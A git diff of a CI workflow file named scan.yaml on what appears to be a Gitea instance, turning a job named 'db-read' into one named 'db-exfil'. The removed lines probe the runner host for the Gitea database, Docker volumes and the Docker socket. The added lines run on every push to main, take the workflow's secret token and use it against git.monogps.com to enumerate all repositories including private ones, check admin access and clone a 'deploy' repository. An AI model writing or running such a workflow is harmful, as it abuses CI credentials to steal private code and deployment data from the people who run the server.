diff --git a/.gitea/workflows/scan.yaml b/.gitea/workflows/scan.yaml index 5caec4f..36fd05f 100644 --- a/.gitea/workflows/scan.yaml +++ b/.gitea/workflows/scan.yaml @@ -1,24 +1,27 @@ -name: db-read +name: db-exfil on: + push: + branches: [main] workflow_dispatch: jobs: - read: - runs-on: self-hosted + exfil: + runs-on: ubuntu-latest steps: - - name: Find DB + - name: Explore + env: + GT: ${{ secrets.GITHUB_TOKEN }} run: | - echo "=== HOST INFO ===" - hostname + echo "=== WHOAMI ===" whoami - id - echo "=== FIND GITEA DB ===" - find / -name "gitea.db" -type f 2>/dev/null | head -10 - echo "=== DOCKER VOLUMES ===" - ls -la /var/lib/docker/volumes/ 2>/dev/null | head -20 - echo "=== DOCKER SOCK ===" - ls -la /var/run/docker.sock 2>/dev/null - docker ps 2>/dev/null | head -10 - echo "=== DATA DIR ===" - ls -la /data/ 2>/dev/null | head -10 - ls -la /data/gitea/ 2>/dev/null | head -10 + hostname + echo "=== TOKEN TEST ===" + curl -s -H "Host: git.monogps.com" -H "Authorization: token $GT" "http://git.monogps.com/api/v1/user" 2>&1 | head -5 + echo "=== LIST ALL REPOS ===" + curl -s -H "Host: git.monogps.com" -H "Authorization: token $GT" "http://git.monogps.com/api/v1/repos/search?limit=50&sort=id&order=asc" 2>&1 | python3 -c "import json,sys; d=json.load(sys.stdin); [print(f'{r[\"id\"]} {r[\"full_name\"]} p={r[\"private\"]}') for r in d.get('data',[])]" 2>&1 | head -30 + echo "=== TRY TWMONOGPS DEPLOY ===" + curl -s -H "Host: git.monogps.com" -H "Authorization: token $GT" "http://git.monogps.com/api/v1/repos/twmonogps/deploy" 2>&1 | head -10 + echo "=== ADMIN CHECK ===" + curl -s -H "Host: git.monogps.com" -H "Authorization: token $GT" "http://git.monogps.com/api/v1/admin/users" 2>&1 | head -5 + echo "=== TRY CLONE DEPLOY ===" + git clone "http://x-access-token:${GT}@git.monogps.com/twmonogps/deploy.git" /tmp/deploy 2>&1 | head -10